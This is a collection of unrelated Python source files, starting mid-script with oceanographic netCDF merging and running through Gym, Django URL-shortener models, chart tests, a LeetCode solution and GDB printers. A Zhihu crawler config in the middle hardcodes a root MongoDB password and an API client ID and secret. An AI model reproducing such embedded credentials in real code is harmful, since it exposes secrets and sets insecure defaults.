ctdfile=cast, nutfile=(args.nut_ncpath + nut_cast)
)
)
###nc readin/out
df = EcoFOCI_netCDF(cast)
global_atts = df.get_global_atts()
vars_dic = df.get_vars()
ncdata = df.ncreadfile_dic(output="vector")
ncdata_coords = [ncdata.pop(x, "-9999") for x in ["time", "time2", "lat", "lon"]]
df.close()
if "depth" in vars_dic:
ncdata["dep"] = ncdata["depth"]
### read paired nut file
try:
ncdata_nut = {}
dfn = EcoFOCI_netCDF(args.nut_ncpath + nut_cast)
global_atts_nut = dfn.get_global_atts()
vars_dic_nut = dfn.get_vars()
ncdata_nut = dfn.ncreadfile_dic(output="vector")
dfn.close()
except:
print("No matched Nutrient Data from cast:ctd{}".format(global_atts["CAST"]))
print("Copy CTD file to output dir")
copyfile(cast, args.output + cast.split("/")[-1])
if args.csv:
nc_only = pd.DataFrame.from_dict(ncdata)
nc_only.to_csv(args.output + nut_cast.replace("nut.nc", "ctd.csv"))
continue
data_dic = {}
# prep dictionary to send to netcdf gen
try:
data_dic.update({"dep": ncdata_nut["depth"][:].round()})
except KeyError:
data_dic.update({"dep": ncdata_nut["dep"][:].round()})
# check for all variables in ctdfile
for key in EPIC_VARS_dict.keys():
if key in ncdata.keys():
if args.verbose:
print("{} as defined found in ctd nc file".format(key))
else:
if args.verbose:
print("{} as defined not in ctd nc file".format(key))
# using config file, build datadic by looping through each variable and using
for key in EPIC_VARS_dict.keys():
if not key in ncdata.keys():
try:
data_dic.update({key: ncdata_nut[key][:]})
if args.verbose:
print("{} as defined found in nut nc file".format(key))
except KeyError:
if args.verbose:
print("{} as defined not in nut nc file".format(key))
cruise = args.CruiseID.lower()
# build complete dataframe from nuts to match to ctd
try:
nut_df = pd.merge(
pd.DataFrame.from_dict(ncdata),
pd.DataFrame.from_dict(data_dic),
how="outer",
on=["dep"],
)
except:
print("Failed Merger - skip cast:ctd{}".format(global_atts["CAST"]))
print("Copy CTD file to output dir")
copyfile(cast, args.output + cast.split("/")[-1])
if args.csv:
nc_only = pd.DataFrame.from_dict(ncdata)
nc_only.to_csv(args.output + nut_cast.replace("nut.nc", "mergefailed.csv"))
continue
if args.csv:
nut_df.to_csv(args.output + nut_cast.replace("nut.nc", "merged.csv"))
else:
history = ":File created by merging {nutfile} and {ctdfile} files".format(
nutfile=nut_cast, ctdfile=cast.split("/")[-1]
)
# build netcdf file - filename is castid
### Time should be consistent in all files as a datetime object
# convert timestamp to datetime to epic time
profile_name = args.output + nut_cast.replace("nut", "merged")
ncinstance = EcF_write.NetCDF_Create_Profile(savefile=profile_name)
ncinstance.file_create()
ncinstance.sbeglobal_atts(
raw_data_file=args.ctd_ncpath.split("/")[-1]
+ ","
+ args.nut_ncpath.split("/")[-1],
CruiseID=cruise,
Cast=cast,
)
ncinstance.dimension_init(depth_len=len(nut_df))
ncinstance.variable_init(EPIC_VARS_dict)
ncinstance.add_coord_data(
depth=nut_df["dep"].values,
latitude=ncdata_coords[2],
longitude=ncdata_coords[3],
time1=ncdata_coords[0],
time2=ncdata_coords[1],
)
ncinstance.add_data(EPIC_VARS_dict, data_dic=nut_df.to_dict("list"))
ncinstance.add_history(history)
ncinstance.close()
|
from .lib.sql_util import *
from .lib.mysql_lib import *
from .lib.pg_lib import *
from .lib.global_lib import *
from .gpss.data_pb2_grpc import *
from .gpss.data_pb2 import *
from .gpss.gpss_pb2_grpc import *
from .gpss.gpss_pb2 import *
|
from ..environment import Environment
import gym
#import roboschool
import torch
import numpy as np
class Gym_base(Environment):
def __init__(self, env_params):
super(Gym_base, self).__init__(env_params)
env_params = self.ingest_params_lvl1(env_params)
self.env = None
self.action_space = None
self.obs_space = None
self.obs_high = None
self.obs_low = None
self.observation = None
self.reward = 0. # Matrix of function values
self.done = False
self.info = {}
self.iteration = 0 # State
self.minimize = False
self.target = 999999 # Infinity, max score
self.RAM = env_params["RAM"]
self.IMG = env_params["IMG"]
self.discrete = env_params["Discrete"]
def ingest_params_lvl1(self, env_params):
assert type(env_params) is dict
default_params = {
"env name": "MsPacman-v0",
"scoring type": "score",
"populations": False, # Population-based optimization
"RAM": False,
"IMG": False,
"Discrete": True
}
default_params.update(env_params) # Update with user selections
return default_params
def init_env(self, name):
self.env = gym.make(name) # Location
#self.env._max_episode_steps = 50000
self.action_space = self.env.action_space
self.obs_space = self.env.observation_space
self.obs_high = self.obs_space.high
self.obs_low = self.obs_space.low
observation = self.env.reset()
self.set_obs(observation)
def set_obs(self, x):
if self.RAM:
self.observation = torch.Tensor(x).cuda()
else:
x = np.moveaxis(x, -1, 0)
x = torch.Tensor(x).cuda()
self.observation = x.unsqueeze(0)
def set_obs_(self, x):
self.observation = x
def step(self, action):
"""Instantiates the plotter class if a plot is requested by the user."""
if self.discrete:
action = np.argmax(action)
else:
action = np.array([action])
#action = np.expand_dims(action, 0)
#action = self.get_random_action()
observation, reward, self.done, self.info = self.env.step(action)
self.reward += reward
self.set_obs(observation)
self.iteration += 1
def evaluate(self, _):
return self.reward
def reset_state(self):
self.iteration = 0
observation = self.env.reset()
self.set_obs(observation)
self.reward = 0. # Matrix of function values
self.done = False
self.info = {}
def get_random_action(self):
action = self.action_space.sample()
return action
def render(self):
self.env.render()
def close(self):
self.env.close()
|
import struct
from shared.lmdb_support import serialize_tuple_of_integers
def test_able_to_serialize():
data = (2506, 723526)
expected_output = b'\xca\t\x00\x00\x00\x00\x00\x00F\n\x0b\x00\x00\x00\x00\x00'
assert serialize_tuple_of_integers(data) == expected_output
def test_serialization_is_correct():
original_data = (2506, 723526)
expected_output = b'\xca\t\x00\x00\x00\x00\x00\x00F\n\x0b\x00\x00\x00\x00\x00'
output = serialize_tuple_of_integers(original_data)
assert output == expected_output
assert struct.unpack("<2Q", output) == original_data
|
import pyexcel as p
from common import get_fixtures
RANGE_COLOR = ['#313695', '#4575b4', '#74add1', '#abd9e9',
'#e0f3f8', '#ffffbf',
'#fee090', '#fdae61', '#f46d43', '#d73027', '#a50026']
def test_pie_chart():
s = p.get_sheet(file_name=get_fixtures('pie.csv'))
s.save_as('pie.echarts.html', chart_type='pie')
def test_kline_chart():
s = p.get_sheet(file_name=get_fixtures('kline.csv'))
s.save_as('kline.echarts.html', chart_type='kline', legend='daily k')
def test_radar_chart():
s = p.get_sheet(file_name=get_fixtures('radar.csv'))
s.save_as('radar.echarts.html', chart_type='radar')
def test_bar_chart():
s = p.get_sheet(file_name=get_fixtures('bar.csv'))
s.save_as('bar.echarts.html', chart_type='bar')
def test_scatter3d_chart():
s = p.get_sheet(file_name=get_fixtures('scatter_3d.csv'))
s.save_as('scatter3d.echarts.html', chart_type='scatter3d',
is_visualmap=True,
visual_range_color=RANGE_COLOR)
def test_bar3d_chart():
s = p.get_sheet(file_name=get_fixtures('bar3d.csv'))
s.save_as('bar3d.echarts.html', chart_type='bar3d',
is_visualmap=True, visual_range_color=RANGE_COLOR,
visual_range=[0, 20],
grid3D_width=200, grid3D_depth=80)
def test_heatmap_chart():
s = p.get_sheet(file_name=get_fixtures('bar3d.csv'))
s.save_as('heatmap.echarts.html', chart_type='heatmap',
is_visualmap=True, visual_range_color=RANGE_COLOR,
visual_range=[0, 20],
visual_text_color="#000", visual_orient='horizontal')
def test_effectscatter_chart():
s = p.get_sheet(file_name=get_fixtures('effectscatter.csv'))
s.save_as('effectscatter.echarts.html', chart_type='effectscatter')
def test_funnel_chart():
s = p.get_sheet(file_name=get_fixtures('funnel.csv'))
s.save_as('funnel.echarts.html', chart_type='funnel')
def test_line_chart():
s = p.get_sheet(file_name=get_fixtures('line.csv'))
s.save_as('line.echarts.html', chart_type='line')
def test_gauge_chart():
s = p.get_sheet(file_name=get_fixtures('gauge.csv'))
s.save_as('gauge.echarts.html', chart_type='gauge')
|
from call_views import *
from views import *
|
'''
models.py contains the persistence logic for Snakr.
'''
from django.db import models
from django.core.validators import URLValidator
from django.utils.translation import ugettext_lazy as _
from ipaddress import IPv6Interface, IPv4Interface, IPv6Address, IPv4Address, ip_interface
from snakraws import settings
from snakraws.utils import get_hash
TABLE_PREFIX = 'snakraws'
EVENT_TYPE = {
'B': _('Blacklisted'),
'D': _('Debug'),
'E': _('Error'),
'I': _('Information'),
'L': _('New Long URL Submitted'),
'N': _('Short URL Inactive'),
'R': _('Existing Long URL Resubmitted'),
'S': _('Short URL Redirect'),
'U': _('Short URL Unrecognized/Not Resolvable'),
'W': _('Warning'),
'X': _('Exception'),
'Z': _('Unknown Event'),
}
DEFAULT_EVENT_TYPE = 'Z'
HTTP_STATUS_CODE = {
200: _('OK (200)'),
301: _('Redirect (301)'),
302: _('Redirect (302)'),
400: _('Bad Request (400)'),
403: _('Forbidden (403)'),
404: _('Not Found (404)'),
422: _('Unprocessable Entity (422)'),
500: _('Server Exception (500)'),
0: _('No response')
}
DEFAULT_HTTP_STATUS_CODE = 403
DEFAULT_URL_ID = get_hash('unknown')
UNSPECIFIED_URL_ID = get_hash('unspecified')
_USE_EXISTS = getattr(settings, 'USE_IF_DIM_EXISTS', False)
class DimGeoLocation(models.Model):
id = models.AutoField(
primary_key=True
)
hash = models.BigIntegerField(
unique=True,
null=False
)
is_mutable = models.BooleanField(
default=True,
null=False
)
providername = models.CharField(
max_length=50,
null=False
)
postalcode = models.CharField(
unique=True,
max_length=32,
null=False
)
lat = models.DecimalField(
max_digits=7,
decimal_places=4,
null=True
)
lng = models.DecimalField(
max_digits=7,
decimal_places=4,
null=True
)
city = models.CharField(
max_length=100,
null=True
)
regionname = models.CharField(
max_length=100,
null=True
)
regioncode = models.CharField(
max_length=2,
null=True
)
countryname = models.CharField(
max_length=100,
null=True
)
countrycode = models.CharField(
max_length=2,
null=True
)
countyname = models.CharField(
max_length=100,
null=True
)
countyweight = models.DecimalField(
max_digits=5,
decimal_places=2,
null=True
)
allcountyweights = models.CharField(
max_length=100,
null=True
)
class Meta:
app_label = TABLE_PREFIX
managed = False
db_table = '%s_dimgeolocations' % TABLE_PREFIX
def __str__(self):
return '[ %d, "%s", "%s", "%s", "%s" ]' % (self.hash, self.postalcode, self.city, self.regionname, self.countryname)
def __unicode__(self):
return u'[ %d, "%s", "%s", "%s", "%s" ]' % (self.hash, self.postalcode, self.city, self.regionname, self.countryname)
class DimDevice(models.Model):
id = models.AutoField(primary_key=True)
hash = models.BigIntegerField(
unique=True,
null=False)
deviceid = models.CharField(
unique=True,
max_length=40,
null=False)
is_mutable = models.BooleanField(
default=True,
null=False)
class Meta:
app_label = TABLE_PREFIX
managed = False
db_table = '%s_dimdevices' % TABLE_PREFIX
def __str__(self):
return self.deviceid
def __unicode__(self):
return self.deviceid
class DimHost(models.Model):
id = models.AutoField(primary_key=True)
hash = models.BigIntegerField(
unique=True,
null=False)
hostname = models.CharField(
unique=True,
max_length=253,
null=False)
is_mutable = models.BooleanField(
default=True,
null=False)
class Meta:
app_label = TABLE_PREFIX
managed = False
db_table = '%s_dimhosts' % TABLE_PREFIX
def __str__(self):
return self.host
def __unicode__(self):
return self.host
class DimIP(models.Model):
id = models.AutoField(primary_key=True)
hash = models.BigIntegerField(
unique=True,
null=False)
ip = models.CharField(
unique=True,
max_length=39,
null=False)
is_mutable = models.BooleanField(
default=True,
null=False)
class Meta:
app_label = TABLE_PREFIX
managed = False
db_table = '%s_dimips' % TABLE_PREFIX
def __str__(self):
return self.ip
def __unicode__(self):
return self.ip
def save(self, *args, **kwargs):
super(DimIP, self).save(*args, **kwargs)
@property
def is_ipv4(self):
return isinstance(IPv4Interface, ip_interface(self.ip.encode('utf8')))
@property
def is_ipv6(self):
return isinstance(IPv6Interface, ip_interface(self.ip.encode('utf8')))
@property
def ipv4(self):
if self.is_ipv6:
v4 = self.ipv6.ipv4_mapped
if not v4:
v4 = self.ipv6.sixtofour
else:
v4 = IPv4Address(self.ip.encode('utf8'))
return v4
@property
def ipv6(self):
if self.is_ipv4:
return None
return IPv6Address(self.ip.encode('utf8'))
@property
def address(self):
if self.is_ipv6:
return self.ipv6.ip.exploded
else:
return self.ipv4.ip.exploded
class DimReferer(models.Model):
id = models.AutoField(primary_key=True)
hash = models.BigIntegerField(
unique=True,
null=False)
referer = models.CharField(
max_length=1024,
null=False)
is_mutable = models.BooleanField(
default=True,
null=False)
class Meta:
app_label = TABLE_PREFIX
managed = False
db_table = '%s_dimreferers' % TABLE_PREFIX
def __str__(self):
return self.referer
def __unicode__(self):
return self.referer
class DimUserAgent(models.Model):
id = models.AutoField(primary_key=True)
hash = models.BigIntegerField(
unique=True,
null=False)
useragent = models.CharField(
max_length=8192,
null=False)
is_mutable = models.BooleanField(
default=True,
null=False)
class Meta:
app_label = TABLE_PREFIX
managed = False
db_table = '%s_dimuseragents' % TABLE_PREFIX
def __str__(self):
return self.useragent
def __unicode__(self):
return self.useragent
class LongURLs(models.Model):
id = models.AutoField(primary_key=True)
hash = models.BigIntegerField(
unique=True,
null=False)
longurl = models.CharField(
max_length=4096,
validators=[URLValidator()],
null=False,
blank=False)
originally_encoded = models.BooleanField(
null=False)
is_active = models.BooleanField(
null=False)
title = models.CharField(
max_length=100,
null=False,
blank=True)
description = models.CharField(
max_length=300,
null=False,
blank=True)
image_url = models.CharField(
max_length=4096,
validators=[URLValidator()],
null=True,
blank=False)
byline = models.CharField(
max_length=100,
null=False,
blank=True)
site_name = models.CharField(
max_length=100,
null=False,
blank=True)
meta_status = models.IntegerField(
unique=False,
null=False)
meta_status_msg = models.CharField(
max_length=1024,
null=False,
blank=True)
class Meta:
app_label = TABLE_PREFIX
managed = False
db_table = '%s_longurls' % TABLE_PREFIX
def __str__(self):
return self.longurl
def __unicode__(self):
return self.longurl
class ShortURLs(models.Model):
id = models.AutoField(primary_key=True)
hash = models.BigIntegerField(
unique=True,
null=False)
longurl = models.OneToOneField(
"LongURLs",
db_column="longurl_id",
to_field="id",
unique=True,
null=False,
on_delete=models.CASCADE)
shorturl = models.CharField(
max_length=40,
validators=[URLValidator()],
null=False,
blank=False)
shorturl_path_size = models.SmallIntegerField(
null=True)
compression_ratio = models.DecimalField(
max_digits=10,
decimal_places=2,
null=True)
is_active = models.BooleanField(
null=False)
class Meta:
app_label = TABLE_PREFIX
managed = False
db_table = '%s_shorturls' % TABLE_PREFIX
def __str__(self):
return self.shorturl
def __unicode__(self):
return self.shorturl
class FactEvent(models.Model):
id = models.AutoField(primary_key=True)
event_yyyymmdd = models.CharField(
max_length=8
)
event_hhmiss = models.CharField(
max_length=6
)
event_type = models.CharField(
max_length=1,
null=False
)
cid = models.CharField(
max_length=40,
null=False
)
http_status_code = models.SmallIntegerField(
null=False
)
info = models.CharField(
max_length=8192,
null=False)
longurl = models.ForeignKey(
'LongURLs',
db_column="longurl_id",
to_field="id",
null=False,
on_delete=models.DO_NOTHING)
shorturl = models.ForeignKey(
'ShortURLs',
db_column="shorturl_id",
to_field="id",
null=False,
on_delete=models.DO_NOTHING)
geo = models.ForeignKey(
'DimGeoLocation',
db_column="geo_id",
to_field="id",
null=False,
on_delete=models.DO_NOTHING)
device = models.ForeignKey(
'DimDevice',
db_column="device_id",
to_field="id",
null=False,
on_delete=models.DO_NOTHING)
host = models.ForeignKey(
'DimHost',
db_column="host_id",
to_field="id",
null=False,
on_delete=models.DO_NOTHING)
ip = models.ForeignKey(
'DimIP',
db_column="ip_id",
to_field="id",
null=False,
on_delete=models.DO_NOTHING)
referer = models.ForeignKey(
'DimReferer',
db_column="referer_id",
to_field="id",
null=False,
on_delete=models.DO_NOTHING)
useragent = models.ForeignKey(
'DimUserAgent',
db_column="useragent_id",
to_field="id",
null=False,
on_delete=models.DO_NOTHING)
class Meta:
app_label = TABLE_PREFIX
managed = False
db_table = '%s_factevents' % TABLE_PREFIX
def __str__(self):
return "%d" % self.id
def __unicode__(self):
return "%d" % self.id
class Blacklist(models.Model):
id = models.AutoField(primary_key=True)
created_on = models.DateTimeField(
null=False
)
is_active = models.BooleanField(
null=False
)
geo = models.ForeignKey(
'DimGeoLocation',
db_column="geo_id",
to_field="id",
null=False,
on_delete=models.DO_NOTHING)
device = models.ForeignKey(
'DimDevice',
db_column="device_id",
to_field="id",
null=True,
on_delete=models.CASCADE)
host = models.ForeignKey(
'DimHost',
db_column="host_id",
to_field="id",
null=True,
on_delete=models.CASCADE)
ip = models.ForeignKey(
'DimIP',
db_column="ip_id",
to_field="id",
null=True,
on_delete=models.CASCADE)
referer = models.ForeignKey(
'DimReferer',
db_column="referer_id",
to_field="id",
null=True,
on_delete=models.CASCADE)
useragent_id = models.ForeignKey(
'DimUserAgent',
db_column="useragent_id",
to_field="id",
null=True,
on_delete=models.CASCADE)
class Meta:
app_label = TABLE_PREFIX
managed = False
db_table = '%s_blacklist' % TABLE_PREFIX
def __str__(self):
return "%d" % self.id
def __unicode__(self):
return "%d" % self.id
|
from django.conf.urls import include
from django.contrib import admin
from django.urls import re_path
from wagtail.admin import urls as wagtailadmin_urls
from wagtail.core import urls as wagtail_urls
from wagtail.documents import urls as wagtaildocs_urls
urlpatterns = [
re_path(r"^django-admin/", admin.site.urls),
re_path(r"^admin/", include(wagtailadmin_urls)),
re_path(r"^documents/", include(wagtaildocs_urls)),
re_path(r"", include(wagtail_urls)),
]
|
import sys
import argparse
import pathlib
import os
import ast
from typing import *
from lib.lightning_train import generate_trainer
import torch
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..'))
from models.lib.data import GeneExpressionData
from models.lib.neural import GeneClassifier
import helper
from os.path import join, dirname, abspath
from helper import download, list_objects
from models.lib.neural import GeneClassifier
from models.lib.lightning_train import DataModule, generate_trainer
if __name__ == "__main__":
data_path = join(pathlib.Path(__file__).parent.resolve(), '..', 'data', 'interim')
for file in ['retina_T.csv', 'retina_labels_numeric.csv']:
print(f'Downloading {file}')
if not os.path.isfile(join(data_path, file)):
download(
remote_name=join('jlehrer', 'retina_data', file),
file_name=join(data_path, file),
)
|
# -*- coding: UTF-8 -*-
import os
# mongodb 连接配置
# MONGO_URI = 'mongodb://%s:%s@%s:%s/admin' % ('username', 'password', 'ip', 'port')
MONGODB_URI = 'mongodb://%s:%s@%s:%s/admin' % ('root', '123456', '127.0.0.1', '27017')
# 重要,不要修改
CLIENT_ID = '8d5227e0aaaa4797a763ac64e0c3b8'
CLIENT_SECRET = 'ecbefbf6b17e47ecb9035107866380'
# 登录参数
LOGIN_DATA = {
'client_id': CLIENT_ID,
'grant_type': 'password',
'source': 'com.zhihu.android',
'timestamp': '',
'username': '',
'password': ''
}
# token 默认保存地址
TOKEN_PATH = os.environ['HOME'] + '/zhihu_crawler/zhihu.token'
# 日志文件
LOG_PATH = os.environ['HOME'] + '/zhihu_crawler/zhihu.log'
# LOG_PATH = 'zhihu.log'
# 知乎 API 根地址
API_URL = 'https://api.zhihu.com'
# 是否需要验证码
CAPTCHA_URL = API_URL + '/captcha'
# 登录
LOGIN_URL = API_URL + '/sign_in'
# 个人信息
MYSELF_PROFILE_URL = API_URL + '/people/self'
# 用户相关操作 {} 填入用户 ID
PEOPLE_URL = API_URL + '/people/{}'
# 我关注的用户
PEOPLE_FOLLOWEES_URL = PEOPLE_URL + '/followees'
# 关注我的用户
PEOPLE_FOLLOWERS_URL = PEOPLE_URL + '/followers'
|
class RegionTopology:
@classmethod
def num_edges(cls):
return 4
@classmethod
def num_corners(cls):
return 4
@classmethod
def _edge_name_to_index_dict_(cls):
return {'U': 0, 'D': 1, 'L': 2, 'R': 3}
@classmethod
def _edge_name_to_index_(cls, _edge_name_):
return {'U': 0, 'D': 1, 'L': 2, 'R': 3}[_edge_name_]
@classmethod
def _edge_index_to_name_dict_(cls):
return {0: 'U', 1: 'D', 2: 'L', 3: 'R'}
@classmethod
def _edge_index_to_name_(cls, _edge_index_):
return {0: 'U', 1: 'D', 2: 'L', 3: 'R'}[_edge_index_]
@classmethod
def _edge_pairing_(cls):
return {'U': 'D', 'D': 'U', 'L': 'R', 'R': 'L'}
@classmethod
def _edge_index_pairing_(cls):
return {0: 1, 1: 0, 2: 3, 3: 2}
@classmethod
def _corner_name_to_index_dict_(cls):
return {'UL': 0, 'DL': 1, 'UR': 2, 'DR': 3,
'LU': 0, 'LD': 1, 'RU': 2, 'RD': 3}
@classmethod
def _corner_name_to_index_(cls, _corner_name_):
return {'UL': 0, 'DL': 1, 'UR': 2, 'DR': 3,
'LU': 0, 'LD': 1, 'RU': 2, 'RD': 3}[_corner_name_]
@classmethod
def _corner_index_to_name_(cls, _corner_index_):
return {0: 'UL', 1: 'DL', 2: 'UR', 3: 'DR'}[_corner_index_]
@classmethod
def _edge_corner_local_numbering_(cls, _edge_index_):
"""
Notice the values are always increasing.
"""
return {0: (0, 2), # the Upper-side has corners locally numbered 0, 2.
1: (1, 3), # the Down-side has corners locally numbered 1, 3.
2: (0, 1), # the Left-side has corners locally numbered 0, 1.
3: (2, 3)}[_edge_index_]
@classmethod
def _axis_indix_dict_(cls):
return {'x': 0, 'y': 1}
@classmethod
def _edge_axis_distribution_(cls):
"""
Here 'U':(0,0) means the U edge is perpendicular to the 0-axis and at the
starting side. 'D':(0,-1) means the 'D' edge is perpendicular to the 0-axis but
at the end side, so -1. And 'R':(1,-1) means the 'R' edge is perpendicular to
1-axis and at the end side. And so on.
"""
return {'U': (0, 0), 'D': (0, -1), 'L': (1, 0), 'R': (1, -1)}
|
from typing import List
import spacy
import string
from src.lm_core import GPTLM
from .utils import plot_topk, draw_wordcloud, scatter_plot
import streamlit as st
nlp = spacy.load("en_core_web_sm")
gpt = GPTLM()
def analyse_text(articles: List, filters=None, probs_plot=False, starting_idx=0 ,
path="data/"):
# from nltk.corpus import stopwords
################
# import nltk
# nltk.download('stopwords')
###############
# curated stop_words
if filters=="stopwords":
with open("stopwords-en.txt") as f:
content = f.readlines()
stop_words = set([x.strip() for x in content] + list(string.punctuation))
top_10_cnt, word_dict_10, probs_10 = 0, {}, []
top_100_cnt, word_dict_100, probs_100 = 0, {}, []
top_1000_cnt, word_dict_1000, probs_1000 = 0, {}, []
top_x_cnt, word_dict_x, probs_x = 0, {}, []
for article in articles:
article_list = article.split("\n\n")
# sen = ""
# for s in article_list:
# if len((s + sen).split(' ')) < 800:
# sen = sen + " " + s
# article = sen[1:]
if filters=="ents":
doc = nlp(article)
ent_list = [ent.text for ent in doc.ents]
np_list = [str(token) for token in doc if token.tag_[:2] == "NN"]
for sentence in article_list:
#for sentence in [article]:
if len(sentence.split(" ")) > 5:
text = gpt.tokenizer.bos_token + " " + sentence
outputs = gpt.get_probabilities(text, top_k=1000)
for idx, (rank, probs) in enumerate(outputs['true_topk'][starting_idx:]):
flag = True
if filters=="ents" and (outputs['bpe_strings'][idx + 1] not in ent_list): # or outputs['bpe_strings'][idx + 1] not in np_list):
flag = False
elif filters=="stopwords" and outputs['bpe_strings'][idx + 1] in stop_words:
flag = False
if flag:
if rank <= 10:
top_10_cnt += 1
word_dict_10[outputs['bpe_strings'][idx + 1]] = probs
# TODO: can include wordcloud for this too.
probs_10.append(outputs['pred_topk'][idx][0][1])
elif rank <= 100:
top_100_cnt += 1
word_dict_100[outputs['bpe_strings'][idx + 1]] = probs
probs_100.append(outputs['pred_topk'][idx][0][1])
elif rank <= 1000:
top_1000_cnt += 1
word_dict_1000[outputs['bpe_strings'][idx + 1]] = probs
probs_1000.append(outputs['pred_topk'][idx][0][1])
elif rank>1000:
top_x_cnt += 1
word_dict_x[outputs['bpe_strings'][idx + 1]] = probs
probs_x.append(outputs['pred_topk'][idx][0][1])
data = {'top_10': top_10_cnt, 'top_100': top_100_cnt, 'top_1000': top_1000_cnt, 'top_x': top_x_cnt}
plot_topk(data, path=path)
draw_wordcloud(word_dict_10, word_dict_100, word_dict_1000, word_dict_x, path=path)
if probs_plot:
col1, col2, col3, col4 = st.beta_columns(4)
scatter_plot(probs_10, col1, path=path+"scatter_col1.jpg")
scatter_plot(probs_100, col2, path=path+"scatter_col2.jpg")
scatter_plot(probs_1000, col3, path=path+"scatter_col3.jpg")
scatter_plot(probs_x, col4, path=path+"scatter_col4.jpg")
#scatter_plot(probs_10, probs_100, probs_1000, probs_x)
|
class PayGateway(object):
'''
@summary: the base class for pay gateway
'''
def create_order(self, orderItemObj, clientIp, **kwargs):
pass
def query_order(self, orderNo):
'''
@summary: query pay result of order
@return: PayResult
'''
pass
def process_notify(self, requestContent):
'''
@summary: process notify from pay interface
@return: PayResult
'''
pass
def generate_qr_pay_url(self, productid):
'''
@summary: create url that can be used to generate qr code
@return: url
'''
pass
def process_qr_pay_notify(self, requestContent):
'''
@summary: process qr notify
@return: proudct id,uid
'''
pass
class PayResult(object):
def __init__(self, orderNo, succ=True, lapsed=False):
self.orderno = orderNo
self.succ = succ
self.lapsed = lapsed
@property
def OrderNo(self):
'''
@summary: order No or merchant
'''
return self.orderno
@property
def Succ(self):
'''
@summary: True: paid successfully
'''
return self.succ
@property
def Lapsed(self):
'''
@summary: True: order is lapsed
'''
return self.lapsed
|
from django.urls import path
from .views import Providers, SetVariables
urlpatterns = [
path('set_variables/<slug:dns>/', SetVariables.as_view(), name="set-vars"),
path('all', Providers.as_view(), name="dns-providers"),
]
|
import socket
class BaseBackend(object):
"""
Base class for backend reporting storage.
settings_namespace is a class attribute that will be used to get the needed
parameters to create new backend instance from a settings file.
"""
settings_namespace = None
def report(self, name, metric, value, tags, id_):
raise NotImplemented()
def _get_host_name(self):
return socket.gethostname()
def _get_payload(self, name, value, tags):
payload = {'host': self._get_host_name(), 'name': name}
if isinstance(value, dict):
payload.update(value)
else:
payload['value'] = value
if tags:
payload['tags'] = tags
return payload
|
# Time: O(n^2)
# Space: O(n)
# 1301 biweekly contest 16 12/28/2019
# Given a square board of chars. You move on the board from the bottom right square marked with the char 'S'.
#
# You need to reach the top left square marked with the char 'E'. The rest of the squares are labeled
# either with a numeric char 1, 2, ..., 9 or with an obstacle 'X'. In one move you can go up, left or
# up-left (diagonally) only if there is no obstacle there.
#
# Return a list of two integers: the first integer is the maximum sum of numeric chars you can collect,
# and the second is the # of such paths that you can take to get that maximum sum, taken modulo 10^9 + 7.
#
# In case there is no path, return [0, 0].
# Constraints:
# 2 <= board.length == board[i].length <= 100
class Solution(object):
def pathsWithMaxScore(self, board): # USE THIS
M, n = 10**9+7, len(board)
dp = [[0, 0] for _ in range(n+1)] # bottom pad row, right pad column, so all cells processed uniformly
for i in range(n-1, -1, -1):
ndp = [[0, 0] for _ in range(n+1)]
for j in range(n-1, -1, -1):
if board[i][j] == 'S':
ndp[j] = [0, 1]
elif board[i][j] != 'X':
for score, ways in (ndp[j+1], dp[j+1], dp[j]):
if score > ndp[j][0]:
ndp[j] = [score, ways]
elif score == ndp[j][0]:
ndp[j][1] = (ndp[j][1] + ways) % M
if ndp[j][1] and board[i][j] != 'E':
ndp[j][0] += int(board[i][j])
dp = ndp
return dp[0]
def pathsWithMaxScore_kamyu(self, board):
"""
:type board: List[str]
:rtype: List[int]
"""
MOD = 10**9+7
directions = [[1, 0], [0, 1], [1, 1]]
dp = [[[0, 0] for r in range(len(board[0])+1)] for r in range(2)]
dp[(len(board)-1)%2][len(board[0])-1] = [0, 1]
for r in reversed(range(len(board))):
for c in reversed(range(len(board[0]))):
if board[r][c] in "XS":
continue
dp[r%2][c] = [0, 0] # BAD: need to reset as reusing two rows
for dr, dc in directions:
if dp[r%2][c][0] < dp[(r+dr)%2][c+dc][0]:
dp[r%2][c] = dp[(r+dr)%2][c+dc][:]
elif dp[r%2][c][0] == dp[(r+dr)%2][c+dc][0]:
dp[r%2][c][1] = (dp[r%2][c][1]+dp[(r+dr)%2][c+dc][1]) % MOD
if dp[r%2][c][1] and board[r][c] != 'E':
dp[r%2][c][0] += int(board[r][c])
return dp[0][0]
print(Solution().pathsWithMaxScore(["E23","2X2","12S"])) # [7,1]
# E23
# 2X2
# 12S
print(Solution().pathsWithMaxScore(["E12","1X1","21S"])) # [4,2]
print(Solution().pathsWithMaxScore(["E11","XXX","11S"])) # [0,0]
|
# Python GDB formatters for parallel-hashmap
# tested with GCC 10.2 / GDB 9.2
# to install it, ensure the script location is in the Python path
# and type the following command (or put it in $HOME/.gdbinit):
# python
# import phmap_gdb
# end
import gdb.printing
def counter():
i = 0
while(True):
yield str(i)
i += 1
def slot_iterator(base_obj):
index = -1
n_items = 0
size = int(base_obj["size_"])
while n_items < size:
index += 1
if int(base_obj["ctrl_"][index]) < 0:
continue
n_items += 1
yield base_obj["slots_"][index]
def parallel_slot_iterator(base_obj):
array = base_obj["sets_"]
array_len = int(array.type.template_argument(1))
for index in range(array_len):
obj = array["_M_elems"][index]["set_"]
yield from slot_iterator(obj)
def flat_map_iterator(name, item):
yield (next(name), item["value"]["first"])
yield (next(name), item["value"]["second"])
def flat_set_iterator(name, item):
yield (next(name), item)
def node_map_iterator(name, item):
yield (next(name), item.dereference()["first"])
yield (next(name), item.dereference()["second"])
def node_set_iterator(name, item):
yield (next(name), item.dereference())
def traverse(iterator, slot_type_iterator):
name = counter()
for item in iterator:
yield from slot_type_iterator(name, item)
def parallel_size(parallel_hash_obj):
array = parallel_hash_obj["sets_"]
array_len = int(array.type.template_argument(1))
size = 0
for index in range(array_len):
size += array["_M_elems"][index]["set_"]["size_"]
return size
class FlatMapPrinter:
def __init__(self, val):
self.val = val
def children(self):
return traverse(slot_iterator(self.val), flat_map_iterator)
def to_string(self):
return f"gtl::flat_hash_map with {int(self.val['size_'])} elements"
def display_hint(self):
return "map"
class FlatSetPrinter:
def __init__(self, val):
self.val = val
def children(self):
return traverse(slot_iterator(self.val), flat_set_iterator)
def to_string(self):
return f"gtl::flat_hash_set with {int(self.val['size_'])} elements"
def display_hint(self):
return "array"
class NodeMapPrinter:
def __init__(self, val):
self.val = val
def children(self):
return traverse(slot_iterator(self.val), node_map_iterator)
def to_string(self):
return f"gtl::node_hash_map with {int(self.val['size_'])} elements"
